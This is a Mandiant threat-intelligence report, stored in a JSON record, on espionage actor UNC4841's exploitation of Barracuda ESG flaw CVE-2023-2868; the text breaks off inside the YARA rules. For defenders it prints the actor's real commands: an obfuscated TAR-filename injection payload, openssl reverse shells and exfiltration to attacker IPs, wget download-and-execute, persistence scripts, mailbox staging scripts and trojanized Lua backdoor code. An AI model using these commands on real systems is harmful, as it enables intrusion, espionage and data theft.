{
	"id": "a2c7eebe-33fd-46cb-ba4a-161736616dfd",
	"created_at": "2026-04-06T00:07:30.979503Z",
	"updated_at": "2026-04-10T03:25:02.342896Z",
	"deleted_at": null,
	"sha1_hash": "3123c17f4af5bb8c4bb995066e9f0478cd6eb24e",
	"title": "Barracuda ESG Zero-Day Vulnerability (CVE-2023-2868) Exploited Globally by Aggressive and Skilled Actor, Suspected Links to China",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 965724,
	"plain_text": "Barracuda ESG Zero-Day Vulnerability (CVE-2023-2868)\r\nExploited Globally by Aggressive and Skilled Actor, Suspected\r\nLinks to China\r\nBy Mandiant\r\nPublished: 2023-06-15 · Archived: 2026-04-05 16:33:42 UTC\r\nWritten by: Austin Larsen, John Palmisano, Mathew Potaczek, John Wolfram, Matthew McWhirt\r\nOn May 23, 2023, Barracuda announced that a zero-day vulnerability (CVE-2023-2868) in the Barracuda Email\r\nSecurity Gateway (ESG) had been exploited in-the-wild as early as October 2022 and that they engaged Mandiant\r\nto assist in the investigation. Through the investigation, Mandiant identified a suspected China-nexus actor,\r\ncurrently tracked as UNC4841, targeting a subset of Barracuda ESG appliances to utilize as a vector for\r\nespionage, spanning a multitude of regions and sectors. Mandiant assesses with high confidence that UNC4841 is\r\nan espionage actor behind this wide-ranging campaign in support of the People’s Republic of China.\r\nStarting as early as October 10, 2022, UNC4841 sent emails (see Figure 2) to victim organizations that contained\r\nmalicious file attachments designed to exploit CVE-2023-2868 to gain initial access to vulnerable Barracuda ESG\r\nappliances. Over the course of their campaign, UNC4841 has primarily relied upon three principal code families\r\nto establish and maintain a presence on an ESG appliance, following the successful exploitation of CVE-2023-2868.\r\nThese code families—SALTWATER, SEASPY, and SEASIDE—were identified in the majority of\r\nUNC4841 intrusions. 
As discussed in the Barracuda notice, all three code families attempt to masquerade as\r\nlegitimate Barracuda ESG modules or services, a trend that UNC4841 has continued with the newly identified\r\nmalware families detailed for the first time in this blog post.\r\nFollowing initial compromise, Mandiant and Barracuda observed UNC4841 aggressively target specific data of interest\r\nfor exfiltration, and in some cases, leverage access to an ESG appliance to conduct lateral movement into the\r\nvictim network, or to send mail to other victim appliances. Mandiant has also observed UNC4841 deploy\r\nadditional tooling to maintain presence on ESG appliances.\r\nOn May 19, 2023, UNC4841’s actions were first discovered by the Barracuda team, and on May 21, 2023,\r\nBarracuda began releasing containment and remediation patches with the goal of eradicating UNC4841 from\r\nimpacted appliances. In response to these efforts, UNC4841 quickly altered their malware and employed\r\nadditional persistence mechanisms in an attempt to maintain their access.\r\nBetween May 22, 2023 and May 24, 2023, UNC4841 countered with high-frequency operations targeting a\r\nnumber of victims located in at least 16 different countries. Overall, Mandiant identified that this campaign has\r\nimpacted organizations across the public and private sectors worldwide, with almost a third being government\r\nagencies (see Figure 5).\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/\r\nPage 1 of 34\n\nOn June 6, 2023, Barracuda reiterated guidance recommending that all impacted Barracuda customers\r\nimmediately isolate and replace compromised appliances. 
In addition, Mandiant recommends further investigation\r\nand hunting within impacted networks, as the identified threat actor has demonstrated a commitment to\r\nmaintaining persistence for continued operations and has shown an ability to move laterally from the ESG\r\nappliance.\r\nThe sections that follow provide the technical details uncovered by Barracuda and Mandiant over the course of the\r\ninvestigation, including initial exploitation of the ESG appliance, the malware deployed, as well as UNC4841's\r\nshift in tactics, techniques and procedures (TTPs) in response to Barracuda’s remediation efforts. The post\r\nconcludes with Mandiant's initial assessment of attribution, and provides hardening, remediation and hunting\r\nrecommendations for organizations impacted.\r\nMandiant commends Barracuda for their decisive actions, transparency, and information sharing following the\r\nexploitation of CVE-2023-2868 by UNC4841. The response to the exploitation of this vulnerability by UNC4841\r\nand subsequent investigation necessitated collaboration between Mandiant, Barracuda, and multiple government\r\nand intelligence partners. Mandiant was enabled by the expertise of Barracuda engineers who provided invaluable\r\nproduct-specific knowledge as well as telemetry data from the full fleet of ESG appliances. The data provided by\r\nBarracuda enabled Mandiant to understand the full scope, investigate at scale, as well as monitor subsequent\r\nattacker activity.\r\nFigure 1: Intrusion timeline\r\nCVE-2023-2868\r\nCVE-2023-2868 is a remote command injection vulnerability present in the Barracuda Email Security Gateway\r\n(appliance form factor only) versions 5.1.3.001-9.2.0.006 that exists when screening email attachments.\r\nThe command injection vulnerability exists in the parsing logic for the processing of TAR files. 
The following\r\ncode within the product is the focal point of the vulnerability:\r\nqx{$tarexec -O -xf $tempdir/parts/$part '$f'};\r\nIt effectively amounts to unsanitized and unfiltered user-controlled input via the $f variable being executed as a\r\nsystem command through Perl’s qx{} routine. $f is a user-controlled variable that will contain the filenames of the\r\narchived files within a TAR. Consequently, UNC4841 was able to format TAR files in a particular manner to\r\ntrigger a command injection attack that enabled them to remotely execute system commands with the privileges of\r\nthe Email Security Gateway product.\r\nInitial Access\r\nStarting as early as October 10, 2022, UNC4841 sent emails to victim organizations that contained specially\r\ncrafted TAR file attachments designed to exploit CVE-2023-2868 to gain initial access to vulnerable Barracuda\r\nESG appliances. In initial emails, UNC4841 attached files with a \".tar\" extension in the filename, whereas in later\r\nemails they used different file extensions such as \".jpg\" or \".dat\". Regardless of file extension, the observed\r\nattachments were valid TAR files that exploited CVE-2023-2868.\r\nObserved emails contained generic email subject and body content, usually with poor grammar and in some cases\r\nstill containing placeholder values. Mandiant assesses UNC4841 likely crafted the body and subject of the\r\nmessage to appear as generic spam in order to be flagged by spam filters or dissuade security analysts from\r\nperforming a full investigation. 
Mandiant has observed this tactic utilized by advanced groups exploiting zero-day\r\nvulnerabilities in the past.\r\nSome examples are shown in Figure 2.\r\nFigure 2a: Email sent by UNC4841 with attachments that exploit CVE-2023-2868\r\nFigure 2b: Email sent by UNC4841 with attachments that exploit CVE-2023-2868\r\nFigure 2c: Email sent by UNC4841 with attachments that exploit CVE-2023-2868\r\nUNC4841 used several different methods to deliver their emails to targeted appliances. In some cases, UNC4841\r\nspoofed email “from” addresses that were for non-existent domains. In other cases, Mandiant observed the actor\r\nuse addresses with domains that were likely not in use or that we suspect they did not control.\r\nBased on analysis of email headers, Mandiant identified the actor sending emails from a Vultr VPS server\r\n(216.238.112[.]82). Mandiant also observed source IP addresses with no notable characteristics or history. In one\r\ncase, email headers indicated that an email originated from an IP address allocated to China Telecom\r\n(101.229.146[.]218). Additionally, Mandiant identified the use of a mail client in the x-mailer header that was\r\nfound to be low-prevalence and that we have observed in use by another China-nexus espionage actor to send\r\nphishing emails.\r\nMandiant also obtained exploit emails that indicated the actor had used email addresses that belonged to an\r\norganization that was also found to have a compromised Barracuda ESG appliance. Furthermore, UNC4841 was\r\nobserved sending emails from compromised appliances to exploit or interact with backdoored modules on other\r\ncompromised appliances. 
Although we do not have conclusive evidence, execution artifacts on a subset of\r\nimpacted appliances indicate that UNC4841 is using a utility named “CSmtp” that we suspect is a command-line\r\nutility to send emails.\r\nNote that at the time of writing, Mandiant has only reviewed a small subset of exploit emails sent by UNC4841.\r\nAs a result, these findings may not be representative of all emails sent by the actor.\r\nReverse Shell\r\nUNC4841’s TAR file attachments exploited CVE-2023-2868 in the Barracuda ESG to execute a reverse shell\r\npayload on certain ESG appliances targeted by the actor. The malicious TAR files recovered to date have all\r\nconsisted of five archived files, four of which appear to have no significance to the execution chain and are not\r\nused in the exploit, with the first file in the archive containing the exploit payload inside its filename. Since the\r\nvulnerability exists in the parsing of this filename, the content of the archived files does not matter and has\r\nconsisted of random strings.\r\nThe exploit payload (filename) is enclosed in backticks (`) and single quotes ('), which triggers the command\r\ninjection in the form of command substitution. 
An example file contained within one of the recovered TAR\r\narchives is shown as follows:\r\n'`abcdefg=c2V0c2lkIHNoIC1jICJta2ZpZm8gL3RtcC9wO3NoIC1pIDwvdG1wL3AgMj4mMXxvcGVuc3NsIHNfY2xpZW50IC1xdWlldCAtY29ubmVjdCAxMDcuMTQ4LjE0OS4xNTY6ODA4MCA+L3RtcC9wIDI+L2Rldi9udWxsO3JtIC90bXAvcCI=;ee=ba;G=s;_ech_o $abcdefg_${ee}se64\r\n-d_${G}h;wh66489.txt`'\r\nOnce deobfuscated, the payload contains the following format where the variable $abcdefg is a base64 encoded\r\nstring that is decoded and executed:\r\nabcdefg=c2V0c2lkIH…;echo $abcdefg | base64 -d | sh\r\nAn example of the base64 payload to be executed is shown as follows:\r\nsetsid sh -c \"mkfifo /tmp/p;sh -i \u003c/tmp/p 2\u003e\u00261|openssl s_client -quiet -connect 107.148.149[.]156:8080 \u003e/tmp/p 2\u003e/dev/null;rm /tmp/p\"\r\nThis series of shell commands achieves the following actions:\r\nsetsid\r\nRuns a new session and detaches it from the terminal. This ensures that the following command\r\nkeeps running even if the terminal ends up being closed.\r\nmkfifo /tmp/p\r\nCreates a named pipe at /tmp/p that will be used as the storage to facilitate transferring the\r\ncommands from the server to be executed.\r\nsh -i \u003c/tmp/p 2\u003e\u00261\r\nCreates a new interactive (-i) shell and redirects its input from the named pipe that was just created.\r\n2\u003e\u00261 redirects the error output to the standard output.\r\nopenssl s_client -quiet -connect 107.148.149[.]156:8080 \u003e/tmp/p 2\u003e/dev/null\r\nOpenSSL is used to create a client that connects to the specified IP address and port (in this case\r\n107.148.149[.]156:8080). The -quiet option is used to suppress session and certificate information\r\noutput. 
The standard output of this command is redirected to the named pipe, and error output is\r\ndiscarded (2\u003e/dev/null).\r\nrm /tmp/p\r\nThis cleans up the named pipe after the OpenSSL connection is closed by removing it.\r\nMandiant also observed the actor deploy a shell script post-compromise with a similar reverse shell payload. Note\r\nthat the path of the named pipe varies, but is usually a single letter and/or number, for example /tmp/p, /tmp/p7,\r\nand /tmp/t.\r\nIn some limited cases, Mandiant also observed UNC4841 execute commands to spawn a bash shell using Python\r\nafter they had gained access:\r\npython -c import pty;pty.spawn(\"/bin/bash\")\r\nBackdoor Payloads\r\nAfter gaining access to appliances, UNC4841 executed wget commands to download secondary backdoor\r\npayloads from open directories on their servers. In some cases, UNC4841 downloaded individual malware files\r\ndirectly. In other cases, Mandiant observed the actor download TAR files that contained backdoor payloads along\r\nwith shell scripts to install and persist them. 
An example of a wget command to download, extract, and execute\r\nthe SALTWATER secondary payload is shown as follows:\r\nsh -c wget --no-check-certificate https://107.148.219[.]53:443/install_reuse/install_reuse.tar;tar -xvf install_reuse.tar;chmod +x update_v35.sh;./update_v35.sh\r\nThis series of shell commands achieves the following actions:\r\nwget --no-check-certificate https://107.148.219[.]53:443/install_reuse/install_reuse.tar\r\nDownloads a tar archive while ignoring SSL/TLS certificate checks\r\ntar -xvf install_reuse.tar\r\nExtracts the tar archive\r\nchmod +x update_v35.sh\r\nEnables execute permissions on the malware installer shell script\r\n./update_v35.sh\r\nExecutes the malware installer\r\nMandiant also observed UNC4841 attempt to use wget to download RAR and ZIP payloads from URLs hosted at\r\ntemp[.]sh; however, these were unsuccessful and Mandiant was unable to obtain them for analysis.\r\nOver the course of the investigation to date, Mandiant and Barracuda have identified three (3) primary backdoors\r\nin use by UNC4841: SEASPY, SALTWATER and SEASIDE.\r\nSEASPY is the primary backdoor that has been deployed by UNC4841 throughout their campaign. SEASPY is a\r\npassive backdoor that establishes itself as a PCAP filter on ports TCP/25 (SMTP) and TCP/587 and is activated by\r\na “magic packet”. Mandiant’s analysis has identified code overlap between SEASPY and cd00r, a publicly\r\navailable backdoor.\r\nEarly deployments of SEASPY, when unpacked, maintained symbols and were installed under the file name:\r\nBarracudaMailService\r\nFollowing Barracuda’s patch, Mandiant observed UNC4841 update SEASPY to strip symbols within the binary,\r\npack the malware with UPX, and use authentication when establishing a reverse shell to a command and control\r\n(C2) server. 
UNC4841 deployed this updated variant with the file names:\r\nresize2fstab\r\nresize_reisertab\r\nFigure 3 depicts the SEASPY critical attack path.\r\nFigure 3: SEASPY attack path\r\nSALTWATER is a module for the Barracuda SMTP daemon (bsmtpd) that has backdoor functionality.\r\nSALTWATER can upload or download arbitrary files, execute commands, and has proxy and tunneling\r\ncapabilities. The backdoor is implemented using hooks on the send, recv, and close syscalls via the third-party\r\nkubo/funchook hooking library, and amounts to five components, most of which are referred to as \"Channels\"\r\nwithin the binary. In addition to providing backdoor and proxying capabilities, these components exhibit classic\r\nbackdoor functionality. The five channels are:\r\nDownloadChannel\r\nUploadChannel\r\nProxyChannel\r\nShellChannel\r\nTunnelArgs\r\nWhen deploying SALTWATER, UNC4841 has repeatedly utilized time-stomping to further hide their malicious\r\nactivity. UNC4841 has also been observed leveraging time-stomping when deploying SEASIDE.\r\nAdditionally, between May 21, 2023 and May 22, 2023, shortly following Barracuda’s initial remediation script\r\ndeployment, UNC4841 quickly made modifications to both SEASPY and SALTWATER related components in\r\norder to prevent effective patching. 
Between May 22, 2023 and May 24, 2023, UNC4841 conducted high\r\nfrequency operations on a number of victims located in at least 16 different countries, modifying 7 components of\r\nSEASPY and at least 2 components of SALTWATER.\r\nSEASIDE is a Lua-based module for the Barracuda SMTP daemon (bsmtpd) that monitors SMTP HELO/EHLO\r\ncommands to receive an encoded C2 IP address and port that it decodes and passes as arguments to an external\r\nbinary (WHIRLPOOL) that establishes a reverse shell.\r\nSANDBAR is a rootkit in the form of a trojanized network file system kernel module for Linux (nfsd_stub.ko) that\r\ncontains hooks to hide processes that begin with a specified name. SANDBAR hides the process ID from being\r\ndisplayed when the /proc filesystem is queried. SANDBAR hooks the \"iterate_shared\" routine of the\r\n\"file_operations\" structure for the /proc filesystem and the subsequent \"filldir\" callback to hide the process. It\r\nappears to be adapted from publicly available rootkit code.\r\nThe SANDBAR sample Mandiant analyzed was configured to hide processes starting with the name “Bar”; it is\r\nlikely this was designed to hide the SEASPY malware, which was deployed with the name \"BarracudaMailService\".\r\nNetwork defenders should be aware that command output or log sources for process listings may be missing\r\nprocesses for malware deployed by UNC4841 if the ESG has been infected with SANDBAR and is hiding\r\nprocesses in this manner.\r\nTrojanized LUA Modules\r\nIn addition to installing backdoors, UNC4841 trojanized several legitimate Barracuda LUA modules by inserting\r\nadditional callback logic to be executed when certain email-related events are received by the appliance. 
A total of\r\nthree (3) trojanized modules were identified across victim sets that we track with two different malware families:\r\nSEASPRAY and SKIPJACK.\r\nSEASPRAY is a launcher written in Lua that is a trojanized Barracuda email security gateway module.\r\nSEASPRAY registers an event handler for incoming email attachments. If an attachment has a filename that\r\ncontains a special value, SEASPRAY copies the file into the /tmp directory and executes an external binary\r\n(WHIRLPOOL) that establishes a reverse shell with the full path as a parameter. The core modification to the Lua\r\nmodule that identifies SEASPRAY is contained in the following snippet:\r\nif string.find(attachment:filename(),'\u003cREDACTED\u003e') ~= nil then\r\n os.execute('cp '..tostring(tmpfile)..' /tmp/'..attachment:filename())\r\n os.execute('rverify'..' /tmp/'..attachment:filename())\r\nend\r\nMandiant also discovered a variant of SEASPRAY code that was inserted into a module that is responsible for\r\nimplementing sender block/accept functionality:\r\nif string.find(sender,\"\u003cREDACTED\u003e\") ~= nil then\r\n os.execute('saslautchd'..' '..sender)\r\nend\r\nWHIRLPOOL is a C-based utility used to create a TLS reverse shell. WHIRLPOOL uses either a single CLI\r\nargument that is a given file path, or two arguments that are a given IP and port. Mandiant has observed\r\nWHIRLPOOL being used alongside SEASPRAY and SEASIDE. Differing callback methods were used across\r\ndiffering victim sets. This may have been done in part to reduce their chance of being discovered, or it may have\r\nbeen done to leverage existing scripts that were already in place on the system as opposed to creating new files.\r\nSKIPJACK is a passive backdoor written in Lua that is a trojanized version of a Barracuda email security gateway\r\nmodule that processes emails. 
SKIPJACK registers a listener for incoming email headers and subjects and\r\ndecodes and executes the content of the “Content-ID” header field. SKIPJACK consists of the following code\r\ninsertion to a listener that processes email headers (reformatted for readability):\r\nif hdr:name() == \"Content-ID\" then\r\n if hdr:body() ~= nil then\r\n if string.match(hdr:body(), \"^[%w%+/=\\r\\n]+$\") then\r\n io.popen(\"echo \\\"\" .. hdr:body() .. \"\\\" | openssl aes-256-cbc -d -A -a -nosalt -K \u003cREDACT\r\n end\r\n end\r\nend\r\nThe value of the “Content-ID” field is checked against the regex \"^[%w%+/=\\r\\n]+$\" to check that it contains only Base64\r\ncharacters. If these conditions are met, SKIPJACK will AES-decrypt the content using openssl, Base64-decode the\r\ndecrypted data, and execute it as a shell command. The openssl command sets the following flags:\r\naes-256-cbc\r\nSpecifies the encryption algorithm to be used, in this case, Advanced Encryption Standard (AES)\r\nwith a 256-bit key in Cipher Block Chaining (CBC) mode.\r\n-d\r\nIndicates that the command will perform decryption. The data provided will be decrypted using the\r\nspecified algorithm and key.\r\n-A\r\nDecodes the input from Base64 encoding before performing the decryption. The input data is\r\nexpected to be in Base64 format.\r\n-a\r\nEncodes the output in Base64 format after performing the decryption. The decrypted data will be\r\npresented in Base64 encoding.\r\n-nosalt\r\nDisables the use of a salt value. A salt is commonly used in encryption to add randomness and\r\nincrease security.\r\n-K \u003cREDACTED\u003e\r\nSpecifies the encryption key to be used. In this case, the key is provided as a hexadecimal value \"\r\n\u003cREDACTED\u003e\". 
The key should have a length appropriate for the chosen encryption algorithm.\r\n-iv \u003cREDACTED\u003e\r\nSpecifies the initialization vector (IV) to be used.\r\nIn summary, the OpenSSL command decrypts input data using AES-256 in CBC mode with a specific key and\r\ninitialization vector. The input is assumed to be Base64-encoded, and the output will also be Base64-encoded. The\r\ncommand does not use a salt value.\r\nCommand and Control Infrastructure\r\nInfrastructure used by UNC4841 was observed hosting default, self-signed SSL temporary certificates that are\r\nshipped on ESG appliances for setup purposes. It is likely that this was an attempt by UNC4841 to masquerade\r\ntheir reverse shell traffic as legitimate communications being performed to Barracuda infrastructure.\r\nSHA-256: 6d1d7fe5be6f1db2d7aa2af2b53ef40c2ac06954d983bb40590944c4d00b6e57\r\nSHA-1: 51f7900806f0783f09d45d5017a89322afeb3fc3\r\nMD5: be5b6b52780d35f1392f45d96beb868c\r\nSubject DN: C=US, ST=California, L=Campbell, O=Barracuda Networks, OU=Engineering, CN=Barracuda/emailAddress=sales@barracuda.com\r\nIssuer DN: C=US, ST=California, L=Campbell, O=Barracuda Networks, OU=Engineering, CN=Barracuda/emailAddress=sales@barracuda.com\r\nSerial Number: 0x2\r\nValidity Period: 2011-09-29 to 2031-09-24\r\nMandiant observed UNC4841 exfiltrate customer-uploaded SSL certificates from compromised Barracuda\r\nappliances, shown as follows:\r\nsh -c openssl s_client -quiet -connect 107.148.219[.]55:443 \u003c /home/product/code/config/ssl_signed_cert.pem 2\u003e\u00261\r\nIn some cases, Mandiant observed what appeared to be legitimate victim certificates hosted on UNC4841’s\r\ninfrastructure. 
It is likely that the actor had extracted these from appliances where victims had configured their\r\nown SSL certificates, which would have been located at the same path.\r\nThere were also cases where the actor had simply used a self-signed certificate generated with default values, such\r\nas the certificate shown as follows:\r\nSHA-256: 6b60c1c833979494caff32bf02391793ac85f533516367f12a1cea857bbacba7\r\nSHA-1: 0ea7adb0b54d8bada0a8dc41ef4a9b255691d1ba\r\nMD5: 683acdb559bbc7fb64431d1f579a8104\r\nSubject DN: C=XX, L=Default City, O=Default Company Ltd\r\nIssuer DN: C=XX, L=Default City, O=Default Company Ltd\r\nSerial Number: 0xf3616b5e0e362361\r\nValidity Period: 2022-11-30 to 2023-11-30\r\nIn multiple cases, UNC4841 used domains rather than IP addresses to establish their reverse shell communications\r\nfrom compromised Barracuda appliances. Through infrastructure analysis, Mandiant identified several points of\r\noverlap with infrastructure attributed to other suspected China-nexus espionage operations. Mandiant suspects that\r\nthis indicates a shared infrastructure procurement support entity rather than the same group being behind both\r\nclusters of activity. China-nexus cyber espionage operations often share tools and infrastructure, so this\r\nobservation strengthens our assessment that UNC4841 is a China-nexus actor. UNC4841 is believed to make use of\r\nparked domains that resolve to command and control IP addresses for a short period of time. This technique has\r\nbeen used by other suspected China-nexus espionage operations, but is not unique to them.\r\nPersistence Methods\r\nOver the course of the investigation, Mandiant has identified a number of ways in which UNC4841 has attempted\r\nto maintain persistence on an impacted appliance. The first attempt at maintaining persistence was through the\r\nexecution of their initial reverse shell via hourly and daily cron jobs. 
These cron jobs were located at the following\r\npaths:\r\n/etc/cron.hourly/core.sh\r\n/etc/cron.hourly/aacore.sh\r\n/etc/cron.hourly/appcheck.sh\r\n/etc/cron.daily/core.sh\r\n/etc/cron.daily/core_check.sh\r\nUNC4841 persistently executed SEASPY on appliance reboot through the following addition to /etc/init.d/rc:\r\n\u003cPATH_TO_SEASPY\u003e eth0\r\nThe following script was leveraged to install the persistence in /etc/init.d/rc:\r\necho -e '/sbin/BarracudaMailService eth0' \u003e\u003e /etc/init.d/rc\r\ncat /etc/init.d/rc\r\ntouch /etc/init.d/rc -r /etc/init.d/reboot\r\nchmod +x /sbin/BarracudaMailService\r\nsetsid sh -c \"/sbin/BarracudaMailService eth0\" \u0026\r\necho \"set the bvp ok\"\r\nrm intentbas\r\n...\r\nIn later iterations, UNC4841 maintained persistent execution of SEASPY by inserting the following command\r\ninto the update_version Perl script executed by the appliance:\r\nsystem(\"\u003cPATH_TO_SEASPY\u003e eth0\")\r\nDespite the naming of this script, it is not a component in the normal application of Barracuda ESG firmware\r\nupdates or patches.\r\nUNC4841 also deployed the SANDBAR kernel rootkit at the following location so it would be executed on\r\nstartup:\r\n/lib/modules/4.9.17-barracuda0/kernel/net/sunrpc/nfsd_stub.ko\r\nExfiltration\r\nEvidence of data staging and exfiltration of email-related data by UNC4841 was observed in a subset of impacted\r\nESG appliances. In the majority of cases, UNC4841 staged the data in .tar.gz files in the /mail/tmp/ directory and\r\nutilized a consistent file naming convention containing 3 letters corresponding to the victim organization followed\r\nby a number such as 001.\r\nOnce staged, UNC4841 leveraged openssl to exfiltrate the .tar.gz file to attacker-controlled infrastructure. 
An\r\nexample of a command leveraged for exfiltration of the staged data can be seen as follows:\r\nsh -c openssl s_client -quiet -connect 137.175.51[.]147:443 \u003c /mail/tmp/\u003cREDACTED\u003e.tar.gz 2\u003e\u00261\r\nIn addition, on a limited number of Email Security Gateway (ESG) appliances, Mandiant recovered shell scripts\r\nutilized by UNC4841 that conducted searches of the “mstore” for emails matching specific users or email domains\r\nand then staged the results for exfiltration. The “mstore” is the location in which email messages are temporarily\r\nstored on the appliance. This activity differs from other email collection activities by UNC4841 as it represents\r\ntargeted collection of email data based on specific individuals or organizations. The targets identified at the\r\naccount level included well-known academics in Taiwan and Hong Kong as well as Asian and European\r\ngovernment officials in Southeast Asia.\r\nThe following script, 1.sh, was leveraged to search the “mstore” and stage user email for exfiltration:\r\npath=\"/mail/mstore/\"\r\nincludeContentKeyword=\"\u003cREDACTED\u003e@\\|\u003cREDACTED\u003e@\\|@\u003cREDACTED\u003e\\|\u003cREDACTED\u003e@\\|\u003cREDACTED\u003e@\\|\u003cREDACTED\u003e@\\|\u003cREDACTED\u003e@\"\r\nexcludeFileNameKeyword=\"*.log\"\r\nfind ${path} -type f ! 
-name $excludeFileNameKeyword | while read line ;\r\ndo\r\nresult=`head -20 ${line} | grep $includeContentKeyword`\r\nif [ -n \"$result\" ]\r\nthen\r\necho ${line} \u003e\u003e tmplist\r\nfi\r\ndone\r\ntar -T /mail/mstore/tmplist -czvf /mail/mstore/tmp.tar.gz\r\nThe following script, start.sh, was another script leveraged by the actor:\r\n#!/bin/bash\r\n \r\n mkdir /usr/share/.uc/\u003cREDACTED\u003e\r\n grep -lrn '\u003cREDACTED\u003e@' /mail/mstore | xargs -i cp {} /usr/share/.uc/\u003cREDACTED\u003e\r\n mkdir /usr/share/.uc/\u003cREDACTED\u003e\r\n grep -lrn '\u003cREDACTED\u003e@' /mail/mstore | xargs -i cp {} /usr/share/.uc/\u003cREDACTED\u003e\r\n mkdir /usr/share/.uc/\u003cREDACTED\u003e\r\n grep -lrn '\u003cREDACTED\u003e@' /mail/mstore | xargs -i cp {} /usr/share/.uc/\u003cREDACTED\u003e\r\n mkdir /usr/share/.uc/\u003cREDACTED\u003e\r\n grep -lrn '\u003cREDACTED\u003e@' /mail/mstore | xargs -i cp {} /usr/share/.uc/\u003cREDACTED\u003e\r\n mkdir /usr/share/.uc/\u003cREDACTED\u003e\r\n grep -lrn '\u003cREDACTED\u003e@' /mail/mstore | xargs -i cp {} /usr/share/.uc/\u003cREDACTED\u003e\r\nIn a limited number of cases, Mandiant observed UNC4841 utilize the anonfiles file-sharing service as a means of\r\nexfiltration.\r\nLateral Movement\r\nUNC4841 was observed conducting reconnaissance activity in a small number of cases. In these cases, the actor\r\nutilized open-source tools such as fscan on the ESG for host detection, port scanning, web fingerprint\r\nidentification, web vulnerability scanning, domain controller identification, and other functions. The following figure\r\nshows an example output from the fscan tool. 
In one environment, the actor scanned over 50 subnets over the\r\ncourse of nine days, with approximately 80% of these being completed in one day.\r\n\u003credacted\u003e::25 open\r\n\u003credacted\u003e:25 open\r\n\u003credacted\u003e:587 open\r\n\u003credacted\u003e:443 open\r\n[*] NetInfo:\r\n[*]\u003credacted\u003e\r\n [-\u003e]\u003credacted\u003e\r\n [-\u003e]\u003credacted\u003e\r\n[*] WebTitle: https://\u003credacted\u003e code:200 len:701 title:IIS Windows Server\r\n\u003credacted\u003e:25 open\r\n\u003credacted\u003e:443 open\r\n[*] LiveTop \u003credacted\u003e/16 段存活数量为: 65\r\n[*] LiveTop \u003credacted\u003e/16 段存活数量为: 26\r\n[*] LiveTop \u003credacted\u003e/16 段存活数量为: 13\r\n\u003credacted\u003e:25 open\r\n\u003credacted\u003e:587 open\r\n\u003credacted\u003e:53 open\r\n\u003credacted\u003e:389 open\r\nTargeting\r\nTargeted organizations have spanned public and private sectors worldwide. A majority of exploitation activity\r\nappears to impact the Americas; however, that may partially reflect the product’s customer base (Figure 4).\r\nFigure 4: Affected organizations by region\r\nAlmost a third of identified affected organizations were government agencies (Figure 5), supporting the\r\nassessment that the campaign had an espionage motivation. 
Further, in the set of entities selected for focused data\r\nexfiltration, shell scripts were uncovered that targeted email domains and users from ASEAN Ministries of Foreign\r\nAffairs (MFAs), as well as foreign trade offices and academic research organizations in Taiwan and Hong Kong.\r\nIn addition, the actors searched for email accounts belonging to individuals working for a government with\r\npolitical or strategic interest to the PRC at the same time that this victim government was participating in high-level diplomatic meetings with other countries.\r\nFigure 5: Government agencies worldwide appear to have been disproportionately targeted\r\nBased on the evidence available at the time of analysis, the earliest compromises appear to have occurred on a small\r\nsubset of appliances geo-located to mainland China. The C2 communications utilized during this early set of\r\ncompromises also leveraged port 8080, while later compromises that occurred globally almost entirely leveraged\r\nport 443 or port 25.\r\nAttribution \r\nMandiant assesses with high confidence that UNC4841 conducted espionage activity in support of the People’s\r\nRepublic of China. While Mandiant has not attributed this activity to a previously known threat group at this time,\r\nwe have identified several infrastructure and malware code overlaps that provide us with a high degree of\r\nconfidence that this is a China-nexus espionage operation. Additionally, the targeting, both at the organizational\r\nand individual account levels, focused on issues that are high policy priorities for the PRC, particularly in the Asia\r\nPacific region including Taiwan. \r\nOutlook and Implications\r\nUNC4841 has shown itself to be highly responsive to defensive efforts and actively modifies its TTPs to maintain its\r\noperations. 
Mandiant strongly recommends impacted Barracuda customers continue to hunt for this actor and\r\ninvestigate affected networks. We expect UNC4841 will continue to alter their TTPs and modify their toolkit,\r\nespecially as network defenders continue to take action against this adversary and their activity is further exposed\r\nby the infosec community. Recommendations and detection rules are provided in the following sections.\r\nRecommendations \r\nIn alignment with Barracuda’s guidance released on May 31, 2023, Mandiant recommends immediate replacement\r\nof compromised ESG appliances, regardless of patch level. Additional guidance for replacing an impacted\r\nappliance can be found on Barracuda’s Trust Center.\r\nIn addition, Mandiant recommends all impacted organizations perform investigation and hunting activities\r\nwithin their networks. An investigation may include, but is not limited to, the following:\r\nSweep the impacted environment for all IOCs provided by both Mandiant and Barracuda.\r\nReview email logs to identify the initial point of exposure.\r\nRevoke and rotate all domain-based and local credentials that were on the ESG at the time of compromise.\r\nRevoke and reissue all certificates that were on the ESG at the time of compromise.\r\nMonitor the entire environment for the use of credentials that were on the ESG at the time of compromise.\r\nMonitor the entire environment for the use of certificates that were on the ESG at the time of compromise.\r\nReview network logs for signs of data exfiltration and lateral movement.\r\nCapture a forensic image of the appliance and conduct a forensic analysis.\r\nPhysical appliance models can be imaged following standard procedures. Most models have two (2)\r\nhot-swappable drives in a RAID1 configuration. \r\nThe provided YARA rules can be applied to appliance images to assist forensic investigators. 
\r\nIn order to aid organizations in their investigations, Mandiant has published a compilation of IOCs observed to\r\ndate which can be found at the end of the post.\r\nAlong with this blog post, Mandiant has produced a detailed Architecture Hardening guide to assist organizations\r\nwith this event. The document contains guidance on the following key items:\r\nNetwork Communication Restrictions\r\nPatching and Updates\r\nCredential Rotation and Segmentation\r\nLogging and Hunting\r\nInfrastructure Lateral Movement Hardening\r\nAcknowledgements\r\nBeyond the listed authors are dozens of consultants and analysts who have been working to help our clients with\r\ncases related to exploitation of CVE-2023-2868. We would also like to specifically thank Barracuda’s Incident\r\nResponse Team, the Mandiant FLARE team, Jakub Jozwiak from Mandiant Adversary Methods as well as\r\nFernando Tomlinson, Josh Villanueva, and Alyssa Glickman from Mandiant Incident Response for their\r\ninvaluable support.\r\nIndicators of Compromise (IOCs)\r\nDetection Rules\r\nYARA Rules\r\nrule M_Hunting_Exploit_Archive_2\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Hunting rule looking for TAR archives with /tmp/ base64 encoded being part of filename of\r\n md5 = \"0d67f50a0bf7a3a017784146ac41ada0\"\r\n strings:\r\n $ustar = { 75 73 74 61 72 }\r\n $b64_tmp = \"/tmp/\" base64\r\n condition:\r\n filesize \u003c 1MB and\r\n $ustar at 257 and\r\n for any i in (0 .. #ustar) : (\r\n $b64_tmp in (i * 512 .. i * 512 + 250)\r\n )\r\n}\r\nrule 